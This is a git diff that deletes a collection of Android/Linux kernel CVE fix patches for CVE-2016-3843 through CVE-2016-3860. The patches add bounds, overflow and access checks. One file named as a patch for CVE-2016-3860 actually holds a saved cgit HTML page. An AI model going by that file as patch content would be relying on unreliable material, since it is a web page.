-@@ -18,6 +18,15 @@ config SECURITY_DMESG_RESTRICT
- 
- 	  If you are unsure how to answer this question, answer N.
- 
-+config SECURITY_PERF_EVENTS_RESTRICT
-+	bool "Restrict unprivileged use of performance events"
-+	depends on PERF_EVENTS
-+	help
-+	  If you say Y here, the kernel.perf_event_paranoid sysctl
-+	  will be set to 3 by default, and no unprivileged use of the
-+	  perf_event_open syscall will be permitted unless it is
-+	  changed.
-+
- config SECURITY
- 	bool "Enable different security models"
- 	depends on SYSFS
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3843/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2016-3843/ANY/0003.patch
deleted file mode 100644
index 5881ba06..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3843/ANY/0003.patch
+++ /dev/null
@@ -1,30 +0,0 @@
-From 8fe72ba71e08fbc2c5a5d4985557247904d76054 Mon Sep 17 00:00:00 2001
-From: Dennis Cagle <d-cagle@codeaurora.org>
-Date: Mon, 15 Aug 2016 14:35:18 -0700
-Subject: msm_defconfig: Enable config for b/29119870
-
-Restriction of kernel performance events requires
-a change to the defconfig.
-
-Bug: 29119870
-Change-Id: Ib7e565a52446e2dcae1aa8c561d4770f2762a4d7
-Signed-off-by: Dennis Cagle <d-cagle@codeaurora.org>
----
- arch/arm64/configs/msm_defconfig | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/arch/arm64/configs/msm_defconfig b/arch/arm64/configs/msm_defconfig
-index 0473936..7755ea1 100644
---- a/arch/arm64/configs/msm_defconfig
-+++ b/arch/arm64/configs/msm_defconfig
-@@ -620,6 +620,7 @@ CONFIG_KERNEL_TEXT_RDONLY=y
- CONFIG_KEYS=y
- CONFIG_SECURITY=y
- CONFIG_SECURITY_NETWORK=y
-+CONFIG_SECURITY_PERF_EVENTS_RESTRICT=y
- CONFIG_LSM_MMAP_MIN_ADDR=4096
- CONFIG_SECURITY_SELINUX=y
- CONFIG_CRYPTO=y
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3843/ANY/0004.patch b/Patches/Linux_CVEs/CVE-2016-3843/ANY/0004.patch
deleted file mode 100644
index ec5ae396..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3843/ANY/0004.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From 15c897f31ba18f67559d6b7f1a6afa855baa756c Mon Sep 17 00:00:00 2001
-From: Jeff Vander Stoep <jeffv@google.com>
-Date: Wed, 1 Jun 2016 13:44:47 -0700
-Subject: ANDROID: restrict access to perf events
-
-Add:
-CONFIG_SECURITY_PERF_EVENTS_RESTRICT=y
-
-to android-base.cfg
-
-The kernel.perf_event_paranoid sysctl is set to 3 by default.
-No unprivileged use of the perf_event_open syscall will be
-permitted unless it is changed.
-
-Bug: 29054680
-Change-Id: Ie7512259150e146d8e382dc64d40e8faaa438917
----
- android/configs/android-base.cfg | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/android/configs/android-base.cfg b/android/configs/android-base.cfg
-index 85e4a93..f820d56 100644
---- a/android/configs/android-base.cfg
-+++ b/android/configs/android-base.cfg
-@@ -143,6 +143,7 @@ CONFIG_RTC_CLASS=y
- CONFIG_RT_GROUP_SCHED=y
- CONFIG_SECURITY=y
- CONFIG_SECURITY_NETWORK=y
-+CONFIG_SECURITY_PERF_EVENTS_RESTRICT=y
- CONFIG_SECURITY_SELINUX=y
- CONFIG_SETEND_EMULATION=y
- CONFIG_STAGING=y
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3850/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3850/ANY/0001.patch
deleted file mode 100644
index ff93d534..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3850/ANY/0001.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 9a59b04c8ed8b57537f2f3cbcb06645575f64ac1 Mon Sep 17 00:00:00 2001
-From: Vijay Kumar Pendoti <vpendo@codeaurora.org>
-Date: Thu, 9 Jun 2016 19:34:01 +0530
-Subject: app: aboot: add integer overflow in booting from emmc
-
-Added integer overflow checks in case of booting from emmc.
-
-Change-Id: If251c7d83a8658a6507e4bbc2a4b86a777505081
----
- app/aboot/aboot.c | 8 ++++++++
- 1 file changed, 8 insertions(+)
-
-diff --git a/app/aboot/aboot.c b/app/aboot/aboot.c
-index b59aa5d..6418ecb 100644
---- a/app/aboot/aboot.c
-+++ b/app/aboot/aboot.c
-@@ -1077,8 +1077,16 @@ int boot_linux_from_mmc(void)
- 
- #if DEVICE_TREE
- 	dt_actual = ROUND_TO_PAGE(hdr->dt_size, page_mask);
-+	if (UINT_MAX < ((uint64_t)kernel_actual + (uint64_t)ramdisk_actual+ (uint64_t)dt_actual + page_size)) {
-+		dprintf(CRITICAL, "Integer overflow detected in bootimage header fields at %u in %s\n",__LINE__,__FILE__);
-+		return -1;
-+	}
- 	imagesize_actual = (page_size + kernel_actual + ramdisk_actual + dt_actual);
- #else
-+	if (UINT_MAX < ((uint64_t)kernel_actual + (uint64_t)ramdisk_actual + page_size)) {
-+		dprintf(CRITICAL, "Integer overflow detected in bootimage header fields at %u in %s\n",__LINE__,__FILE__);
-+		return -1;
-+	}
- 	imagesize_actual = (page_size + kernel_actual + ramdisk_actual);
- #endif
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3854/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3854/ANY/0001.patch
deleted file mode 100644
index 3c57c8ec..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3854/ANY/0001.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From cc96def76dfd18fba88575065b29f2ae9191fafa Mon Sep 17 00:00:00 2001
-From: Terence Ho <terenceh@codeaurora.org>
-Date: Thu, 5 Nov 2015 14:49:03 -0500
-Subject: msm: camera: Add check to prevent array index out of bounds
-
-Add check in msm_mctl_buf_return_buf to prevent array index
-out-of-bounds.
-
-Change-Id: Ie0bbbb1c97e8851ef004074726e90c78d5cdefa7
-Signed-off-by: Terence Ho <terenceh@codeaurora.org>
----
- drivers/media/video/msm/msm_mctl_buf.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/media/video/msm/msm_mctl_buf.c b/drivers/media/video/msm/msm_mctl_buf.c
-index e258097..8b37391 100644
---- a/drivers/media/video/msm/msm_mctl_buf.c
-+++ b/drivers/media/video/msm/msm_mctl_buf.c
-@@ -917,6 +917,12 @@ int msm_mctl_buf_return_buf(struct msm_cam_media_controller *pmctl,
- 	struct msm_cam_v4l2_device *pcam = pmctl->pcam_ptr;
- 	unsigned long flags = 0;
- 
-+	if (image_mode < 0 || image_mode >= MSM_MAX_IMG_MODE) {
-+		pr_err("%s: image_mode %d out-of-bounds",
-+				__func__, image_mode);
-+		return -EINVAL;
-+	}
-+
- 	if (pcam->mctl_node.dev_inst_map[image_mode]) {
- 		idx = pcam->mctl_node.dev_inst_map[image_mode]->my_index;
- 		pcam_inst = pcam->mctl_node.dev_inst[idx];
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3855/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3855/ANY/0001.patch
deleted file mode 100644
index 24f90187..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3855/ANY/0001.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From ab3f46119ca10de87a11fe966b0723c48f27acd4 Mon Sep 17 00:00:00 2001
-From: Manaf Meethalavalappu Pallikunhi <manafm@codeaurora.org>
-Date: Wed, 30 Mar 2016 17:12:16 +0530
-Subject: msm: limits: Check user buffer size before copying to local buffer
-
-User input data is passed in from userspace through debugfs interface
-of supply lm core to validate supply lm core functionality. Ensure
-user buffer size is not greater than expected stack buffer size
-to avoid out of bounds array accesses.
-
-Change-Id: I5a93774855241b50895c5e2b3ff939e4c33a0185
-Signed-off-by: Manaf Meethalavalappu Pallikunhi <manafm@codeaurora.org>
----
- drivers/thermal/supply_lm_core.c | 7 ++++++-
- 1 file changed, 6 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/thermal/supply_lm_core.c b/drivers/thermal/supply_lm_core.c
-index fc8e807..a4d137f 100644
---- a/drivers/thermal/supply_lm_core.c
-+++ b/drivers/thermal/supply_lm_core.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2015-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -303,6 +303,11 @@ static ssize_t supply_lm_input_write(struct file *fp,
- 	enum corner_state gpu;
- 	enum corner_state modem;
- 
-+	if (count > (MODE_MAX - 1)) {
-+		pr_err("Invalid user input\n");
-+		return -EINVAL;
-+	}
-+
- 	if (copy_from_user(&buf, user_buffer, count))
- 		return -EFAULT;
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3857/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3857/ANY/0001.patch
deleted file mode 100644
index 6a2d672d..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3857/ANY/0001.patch
+++ /dev/null
@@ -1,52 +0,0 @@
-From d948109df11c8485e972b4cc0eb4820d4b754615 Mon Sep 17 00:00:00 2001
-From: Dave Weinstein <olorin@google.com>
-Date: Thu, 28 Jul 2016 11:55:41 -0700
-Subject: arm: oabi compat: add missing access checks
-
-commit 7de249964f5578e67b99699c5f0b405738d820a2 upstream.
-
-Add access checks to sys_oabi_epoll_wait() and sys_oabi_semtimedop().
-This fixes CVE-2016-3857, a local privilege escalation under
-CONFIG_OABI_COMPAT.
-
-Cc: stable@vger.kernel.org
-Reported-by: Chiachih Wu <wuchiachih@gmail.com>
-Reviewed-by: Kees Cook <keescook@chromium.org>
-Reviewed-by: Nicolas Pitre <nico@linaro.org>
-Signed-off-by: Dave Weinstein <olorin@google.com>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
-Signed-off-by: Willy Tarreau <w@1wt.eu>
----
- arch/arm/kernel/sys_oabi-compat.c | 8 +++++++-
- 1 file changed, 7 insertions(+), 1 deletion(-)
-
-diff --git a/arch/arm/kernel/sys_oabi-compat.c b/arch/arm/kernel/sys_oabi-compat.c
-index 3e94811..a0aee80 100644
---- a/arch/arm/kernel/sys_oabi-compat.c
-+++ b/arch/arm/kernel/sys_oabi-compat.c
-@@ -275,8 +275,12 @@ asmlinkage long sys_oabi_epoll_wait(int epfd,
- 	mm_segment_t fs;
- 	long ret, err, i;
- 
--	if (maxevents <= 0 || maxevents > (INT_MAX/sizeof(struct epoll_event)))
-+	if (maxevents <= 0 ||
-+			maxevents > (INT_MAX/sizeof(*kbuf)) ||
-+			maxevents > (INT_MAX/sizeof(*events)))
- 		return -EINVAL;
-+	if (!access_ok(VERIFY_WRITE, events, sizeof(*events) * maxevents))
-+		return -EFAULT;
- 	kbuf = kmalloc(sizeof(*kbuf) * maxevents, GFP_KERNEL);
- 	if (!kbuf)
- 		return -ENOMEM;
-@@ -313,6 +317,8 @@ asmlinkage long sys_oabi_semtimedop(int semid,
- 
- 	if (nsops < 1 || nsops > SEMOPM)
- 		return -EINVAL;
-+	if (!access_ok(VERIFY_READ, tsops, sizeof(*tsops) * nsops))
-+		return -EFAULT;
- 	sops = kmalloc(sizeof(*sops) * nsops, GFP_KERNEL);
- 	if (!sops)
- 		return -ENOMEM;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3858/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3858/ANY/0001.patch
deleted file mode 100644
index 6febaff9..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3858/ANY/0001.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From cab2ba71f13f04aa73c8b8dadc3fc184205c9474 Mon Sep 17 00:00:00 2001
-From: Srinivasarao P <spathi@codeaurora.org>
-Date: Mon, 6 Jun 2016 12:33:50 +0530
-Subject: qcom: ssr: Fix possible overflow when copying firmware name
-
-Array overflow can occur in firmware_name_store(), if the variable
-buf contains the string larger than size of subsys->desc->fw_name
-
-Change-Id: Ice39d7a1eb0b5f53125cc5d528021a99b9f7ff90
-Signed-off-by: Srinivasarao P <spathi@codeaurora.org>
----
- drivers/soc/qcom/subsystem_restart.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/soc/qcom/subsystem_restart.c b/drivers/soc/qcom/subsystem_restart.c
-index de3a5a4..c6dbf2e 100644
---- a/drivers/soc/qcom/subsystem_restart.c
-+++ b/drivers/soc/qcom/subsystem_restart.c
-@@ -293,7 +293,8 @@ static ssize_t firmware_name_store(struct device *dev,
- 
- 	pr_info("Changing subsys fw_name to %s\n", buf);
- 	mutex_lock(&track->lock);
--	strlcpy(subsys->desc->fw_name, buf, count + 1);
-+	strlcpy(subsys->desc->fw_name, buf,
-+			 min(count + 1, sizeof(subsys->desc->fw_name)));
- 	mutex_unlock(&track->lock);
- 	return count;
- }
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3859/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-3859/3.10/0001.patch
deleted file mode 100644
index ef80afd2..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3859/3.10/0001.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From fe297dc01f7ea95bb1bff25f6fc4257f0ef832ff Mon Sep 17 00:00:00 2001
-From: Trishansh Bhardwaj <tbhardwa@codeaurora.org>
-Date: Wed, 29 Jun 2016 14:34:31 +0530
-Subject: msm: camera: Fix memory read security flaw
-
-Adds bound check on reg_cfg_cmd->u.dmi_info.hi_tbl_offset.
-
-IOCTL VIDIOC_MSM_VFE_REG_CFG uses usersupplied value without
-performing bounds check for following cmd_type.
-VFE_READ_DMI_16BIT
-VFE_READ_DMI_32BIT
-VFE_READ_DMI_64BIT
-
-Change-Id: I554c45ef3a172f5b5891b67a7e8e7a1f3f3882ed
-Signed-off-by: Trishansh Bhardwaj <tbhardwa@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-index 7ea77dd..4f4884a 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-@@ -969,7 +969,8 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- 	case VFE_READ_DMI_16BIT:
- 	case VFE_READ_DMI_32BIT:
- 	case VFE_READ_DMI_64BIT: {
--		if (reg_cfg_cmd->cmd_type == VFE_WRITE_DMI_64BIT) {
-+		if (reg_cfg_cmd->cmd_type == VFE_WRITE_DMI_64BIT ||
-+			reg_cfg_cmd->cmd_type == VFE_READ_DMI_64BIT) {
- 			if ((reg_cfg_cmd->u.dmi_info.hi_tbl_offset <=
- 				reg_cfg_cmd->u.dmi_info.lo_tbl_offset) ||
- 				(reg_cfg_cmd->u.dmi_info.hi_tbl_offset -
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3859/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-3859/3.18/0002.patch
deleted file mode 100644
index c65b1d80..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3859/3.18/0002.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 61b419297e13ed9a28e9b880548b2d96d4aa6c0d Mon Sep 17 00:00:00 2001
-From: Trishansh Bhardwaj <tbhardwa@codeaurora.org>
-Date: Wed, 29 Jun 2016 14:34:31 +0530
-Subject: msm: camera: Fix memory read by adding bounds check
-
-Adds bound check on reg_cfg_cmd->u.dmi_info.hi_tbl_offset.
-
-IOCTL VIDIOC_MSM_VFE_REG_CFG uses usersupplied value without
-performing bounds check for following cmd_type.
-VFE_READ_DMI_16BIT
-VFE_READ_DMI_32BIT
-VFE_READ_DMI_64BIT
-
-Change-Id: I554c45ef3a172f5b5891b67a7e8e7a1f3f3882ed
-Signed-off-by: Trishansh Bhardwaj <tbhardwa@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-index 8e7cb68..86392c6 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-@@ -1234,7 +1234,8 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- 	case VFE_READ_DMI_16BIT:
- 	case VFE_READ_DMI_32BIT:
- 	case VFE_READ_DMI_64BIT: {
--		if (reg_cfg_cmd->cmd_type == VFE_WRITE_DMI_64BIT) {
-+		if (reg_cfg_cmd->cmd_type == VFE_WRITE_DMI_64BIT ||
-+			reg_cfg_cmd->cmd_type == VFE_READ_DMI_64BIT) {
- 			if ((reg_cfg_cmd->u.dmi_info.hi_tbl_offset <=
- 				reg_cfg_cmd->u.dmi_info.lo_tbl_offset) ||
- 				(reg_cfg_cmd->u.dmi_info.hi_tbl_offset -
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3860/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3860/ANY/0001.patch
deleted file mode 100644
index 05688a3b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3860/ANY/0001.patch
+++ /dev/null
@@ -1,7585 +0,0 @@
-<!DOCTYPE html>
-<html lang='en'>
-<head>
-<title>kernel/msm-3.18 - Unnamed repository</title>
-<meta name='generator' content='cgit v1.1'/>
-<meta name='robots' content='noindex, nofollow'/>
-<link rel='stylesheet' type='text/css' href='/cgit-data/cgit.css'/>
-<link rel='shortcut icon' href='/favicon.ico'/>
-<link rel='alternate' title='Atom feed' href='https://source.codeaurora.org/quic/la/kernel/msm-3.18/atom/sound/soc/msm/qdsp6v2/audio_calibration.c?h=LA.HB.0.3' type='application/atom+xml'/>
-<link rel='vcs-git' href='https://source.codeaurora.org/quic/la/kernel/msm-3.18' title='kernel/msm-3.18 Git repository'/>
-</head>
-<body>
-    <div id="lfcollabprojects-header">
-      <div class="gray-diagonal">
-        <div class="header-inner">
-          <a id="lfcollabprojects-logo" href="http://collabprojects.linuxfoundation.org">Linux Foundation Collaborative Projects</a>
-        </div>
-      </div>
-    </div>
-<div id='cgit'><table id='header'>
-<tr>
-<td class='logo' rowspan='2'><a href='/'><img src='/cgit-data/cgit.png' alt='cgit logo'/></a></td>
-<td class='main'><a href='/'>index</a> : <a title='kernel/msm-3.18' href='/quic/la/kernel/msm-3.18/'>kernel/msm-3.18</a></td><td class='form'><form method='get'>
-<input type='hidden' name='id' value='528976f54be246ec93a71ac53aa4faf3e3791c48'/><select name='h' onchange='this.form.submit();'>
-<option value='LA.HB.0.3' selected='selected'>LA.HB.0.3</option>
-<option value='LA.HB.1.1.1.c2'>LA.HB.1.1.1.c2</option>
-<option value='LA.HB.1.1.1_rb4.12'>LA.HB.1.1.1_rb4.12</option>
-<option value='LA.HB.1.1.1_rb4.5'>LA.HB.1.1.1_rb4.5</option>
-<option value='LA.HB.1.1.1_rb4.6'>LA.HB.1.1.1_rb4.6</option>
-<option value='LA.HB.1.1.1_rb4.7'>LA.HB.1.1.1_rb4.7</option>
-<option value='LA.HB.1.1.1_rb4.8'>LA.HB.1.1.1_rb4.8</option>
-<option value='LA.HB.1.1.1_rb4.9'>LA.HB.1.1.1_rb4.9</option>
-<option value='LA.HB.1.1.2_rb1.10'>LA.HB.1.1.2_rb1.10</option>
-<option value='LA.HB.1.1.2_rb1.12'>LA.HB.1.1.2_rb1.12</option>
-<option value='LA.HB.1.1.2_rb1.13'>LA.HB.1.1.2_rb1.13</option>
-<option value='LA.HB.1.1.2_rb1.14'>LA.HB.1.1.2_rb1.14</option>
-<option value='LA.HB.1.1.2_rb1.16'>LA.HB.1.1.2_rb1.16</option>
-<option value='LA.HB.1.1.2_rb1.19'>LA.HB.1.1.2_rb1.19</option>
-<option value='LA.HB.1.1.2_rb1.21'>LA.HB.1.1.2_rb1.21</option>
-<option value='LA.HB.1.1.2_rb1.9'>LA.HB.1.1.2_rb1.9</option>
-<option value='LA.HB.1.1.5_rb1.11'>LA.HB.1.1.5_rb1.11</option>
-<option value='LA.HB.1.1.5_rb1.12'>LA.HB.1.1.5_rb1.12</option>
-<option value='LA.HB.1.1.5_rb1.8'>LA.HB.1.1.5_rb1.8</option>
-<option value='LA.HB.1.1.5_rb1.9'>LA.HB.1.1.5_rb1.9</option>
-<option value='LA.HB.1.3.1'>LA.HB.1.3.1</option>
-<option value='LA.HB.1.3.1.c1'>LA.HB.1.3.1.c1</option>
-<option value='LA.HB.1.3.1_rb1.10'>LA.HB.1.3.1_rb1.10</option>
-<option value='LA.HB.1.3.1_rb1.11'>LA.HB.1.3.1_rb1.11</option>
-<option value='LA.HB.1.3.1_rb1.12'>LA.HB.1.3.1_rb1.12</option>
-<option value='LA.HB.1.3.1_rb1.13'>LA.HB.1.3.1_rb1.13</option>
-<option value='LA.HB.1.3.1_rb1.15'>LA.HB.1.3.1_rb1.15</option>
-<option value='LA.HB.1.3.1_rb1.2'>LA.HB.1.3.1_rb1.2</option>
-<option value='LA.HB.1.3.1_rb1.3'>LA.HB.1.3.1_rb1.3</option>
-<option value='LA.HB.1.3.1_rb1.4'>LA.HB.1.3.1_rb1.4</option>
-<option value='LA.HB.1.3.1_rb1.5'>LA.HB.1.3.1_rb1.5</option>
-<option value='LA.HB.1.3.1_rb1.7'>LA.HB.1.3.1_rb1.7</option>
-<option value='LA.HB.1.3.1_rb1.8'>LA.HB.1.3.1_rb1.8</option>
-<option value='LA.UM.5.1_rb1.3'>LA.UM.5.1_rb1.3</option>
-<option value='LA.UM.5.1_rb1.4'>LA.UM.5.1_rb1.4</option>
-<option value='LA.UM.5.3.1_rb1'>LA.UM.5.3.1_rb1</option>
-<option value='LA.UM.5.3_rb1'>LA.UM.5.3_rb1</option>
-<option value='LA.UM.5.3_rb1.1'>LA.UM.5.3_rb1.1</option>
-<option value='LA.UM.5.5_rb1.10'>LA.UM.5.5_rb1.10</option>
-<option value='LA.UM.5.6.c1'>LA.UM.5.6.c1</option>
-<option value='LAW.BR.1.0_rb1.10'>LAW.BR.1.0_rb1.10</option>
-<option value='LAW.BR.1.0_rb1.13'>LAW.BR.1.0_rb1.13</option>
-<option value='LAW.BR.1.0_rb1.14'>LAW.BR.1.0_rb1.14</option>
-<option value='LAW.BR.1.0_rb1.15'>LAW.BR.1.0_rb1.15</option>
-<option value='LAW.BR.1.0_rb1.16'>LAW.BR.1.0_rb1.16</option>
-<option value='LAW.BR.1.0_rb1.17'>LAW.BR.1.0_rb1.17</option>
-<option value='LAW.BR.1.0_rb1.18'>LAW.BR.1.0_rb1.18</option>
-<option value='LAW.BR.1.0_rb1.19'>LAW.BR.1.0_rb1.19</option>
-<option value='LAW.BR.1.0_rb1.20'>LAW.BR.1.0_rb1.20</option>
-<option value='LAW.BR.1.0_rb1.21'>LAW.BR.1.0_rb1.21</option>
-<option value='LAW.BR.1.0_rb1.22'>LAW.BR.1.0_rb1.22</option>
-<option value='LAW.BR.1.0_rb1.23'>LAW.BR.1.0_rb1.23</option>
-<option value='LAW.BR.1.0_rb1.24'>LAW.BR.1.0_rb1.24</option>
-<option value='LAW.BR.1.0_rb1.6'>LAW.BR.1.0_rb1.6</option>
-<option value='LAW.BR.1.0_rb1.9'>LAW.BR.1.0_rb1.9</option>
-<option value='LAW.BR.2.0'>LAW.BR.2.0</option>
-<option value='LAW.BR.2.0_rb1.10'>LAW.BR.2.0_rb1.10</option>
-<option value='LAW.BR.2.0_rb1.11'>LAW.BR.2.0_rb1.11</option>
-<option value='LAW.BR.2.0_rb1.12'>LAW.BR.2.0_rb1.12</option>
-<option value='LAW.BR.2.0_rb1.13'>LAW.BR.2.0_rb1.13</option>
-<option value='LAW.BR.2.0_rb1.14'>LAW.BR.2.0_rb1.14</option>
-<option value='LAW.BR.2.0_rb1.17'>LAW.BR.2.0_rb1.17</option>
-<option value='LAW.BR.2.0_rb1.18'>LAW.BR.2.0_rb1.18</option>
-<option value='LAW.BR.2.0_rb1.19'>LAW.BR.2.0_rb1.19</option>
-<option value='LAW.BR.2.0_rb1.2'>LAW.BR.2.0_rb1.2</option>
-<option value='LAW.BR.2.0_rb1.3'>LAW.BR.2.0_rb1.3</option>
-<option value='LAW.BR.2.0_rb1.4'>LAW.BR.2.0_rb1.4</option>
-<option value='LAW.BR.2.0_rb1.5'>LAW.BR.2.0_rb1.5</option>
-<option value='LAW.BR.2.0_rb1.6'>LAW.BR.2.0_rb1.6</option>
-<option value='LAW.BR.2.0_rb1.7'>LAW.BR.2.0_rb1.7</option>
-<option value='LAW.BR.2.0_rb1.8'>LAW.BR.2.0_rb1.8</option>
-<option value='LAW.BR.2.0_rb1.9'>LAW.BR.2.0_rb1.9</option>
-<option value='LE.BR.1.2.1'>LE.BR.1.2.1</option>
-<option value='LE.BR.1.2.1.1_1'>LE.BR.1.2.1.1_1</option>
-<option value='LE.BR.1.2.1_rb1.3'>LE.BR.1.2.1_rb1.3</option>
-<option value='LE.BR.1.2.1_rb1.8'>LE.BR.1.2.1_rb1.8</option>
-<option value='LE.BR.1.3.1_rb1.10'>LE.BR.1.3.1_rb1.10</option>
-<option value='LE.BR.1.3.1_rb1.14'>LE.BR.1.3.1_rb1.14</option>
-<option value='LE.BR.1.3.1_rb1.15'>LE.BR.1.3.1_rb1.15</option>
-<option value='LE.BR.1.3.1_rb1.16'>LE.BR.1.3.1_rb1.16</option>
-<option value='LE.BR.1.3.1_rb1.2'>LE.BR.1.3.1_rb1.2</option>
-<option value='LE.BR.1.3.1_rb1.20'>LE.BR.1.3.1_rb1.20</option>
-<option value='LE.BR.1.3.1_rb1.21'>LE.BR.1.3.1_rb1.21</option>
-<option value='LE.BR.1.3.1_rb1.22'>LE.BR.1.3.1_rb1.22</option>
-<option value='LE.BR.1.3.1_rb1.23'>LE.BR.1.3.1_rb1.23</option>
-<option value='LE.BR.1.3.1_rb1.24'>LE.BR.1.3.1_rb1.24</option>
-<option value='LE.BR.1.3.1_rb1.27'>LE.BR.1.3.1_rb1.27</option>
-<option value='LE.BR.1.3.1_rb1.29'>LE.BR.1.3.1_rb1.29</option>
-<option value='LE.BR.1.3.1_rb1.3'>LE.BR.1.3.1_rb1.3</option>
-<option value='LE.BR.1.3.1_rb1.30'>LE.BR.1.3.1_rb1.30</option>
-<option value='LE.BR.1.3.1_rb1.31'>LE.BR.1.3.1_rb1.31</option>
-<option value='LE.BR.1.3.1_rb1.32'>LE.BR.1.3.1_rb1.32</option>
-<option value='LE.BR.1.3.1_rb1.33'>LE.BR.1.3.1_rb1.33</option>
-<option value='LE.BR.1.3.1_rb1.34'>LE.BR.1.3.1_rb1.34</option>
-<option value='LE.BR.1.3.1_rb1.35'>LE.BR.1.3.1_rb1.35</option>
-<option value='LE.BR.1.3.1_rb1.36'>LE.BR.1.3.1_rb1.36</option>
-<option value='LE.BR.1.3.1_rb1.37'>LE.BR.1.3.1_rb1.37</option>
-<option value='LE.BR.1.3.1_rb1.38'>LE.BR.1.3.1_rb1.38</option>
-<option value='LE.BR.1.3.1_rb1.39'>LE.BR.1.3.1_rb1.39</option>
-<option value='LE.BR.1.3.1_rb1.4'>LE.BR.1.3.1_rb1.4</option>
-<option value='LE.BR.1.3.1_rb1.40'>LE.BR.1.3.1_rb1.40</option>
-<option value='LE.BR.1.3.1_rb1.42'>LE.BR.1.3.1_rb1.42</option>
-<option value='LE.BR.1.3.1_rb1.43'>LE.BR.1.3.1_rb1.43</option>
-<option value='LE.BR.1.3.1_rb1.44'>LE.BR.1.3.1_rb1.44</option>
-<option value='LE.BR.1.3.1_rb1.45'>LE.BR.1.3.1_rb1.45</option>
-<option value='LE.BR.1.3.1_rb1.46'>LE.BR.1.3.1_rb1.46</option>
-<option value='LE.BR.1.3.1_rb1.48'>LE.BR.1.3.1_rb1.48</option>
-<option value='LE.BR.1.3.1_rb1.49'>LE.BR.1.3.1_rb1.49</option>
-<option value='LE.BR.1.3.1_rb1.5'>LE.BR.1.3.1_rb1.5</option>
-<option value='LE.BR.1.3.1_rb1.50'>LE.BR.1.3.1_rb1.50</option>
-<option value='LE.BR.1.3.1_rb1.6'>LE.BR.1.3.1_rb1.6</option>
-<option value='LE.BR.1.3.1_rb1.7'>LE.BR.1.3.1_rb1.7</option>
-<option value='LE.UM.1.0.4_rb1.3'>LE.UM.1.0.4_rb1.3</option>
-<option value='LE.UM.1.0.5_rb1.4'>LE.UM.1.0.5_rb1.4</option>
-<option value='LE.UM.1.0.5_rb1.6'>LE.UM.1.0.5_rb1.6</option>
-<option value='LE.UM.1.0.6_rb1.1'>LE.UM.1.0.6_rb1.1</option>
-<option value='LE.UM.1.1.10_rb1.1'>LE.UM.1.1.10_rb1.1</option>
-<option value='LE.UM.1.1.4.r1'>LE.UM.1.1.4.r1</option>
-<option value='LE.UM.1.1.5_rb1.3'>LE.UM.1.1.5_rb1.3</option>
-<option value='LE.UM.1.1.5_rb1.5'>LE.UM.1.1.5_rb1.5</option>
-<option value='LE.UM.1.1.5_rb1.6'>LE.UM.1.1.5_rb1.6</option>
-<option value='LE.UM.1.1.6_rb1.4'>LE.UM.1.1.6_rb1.4</option>
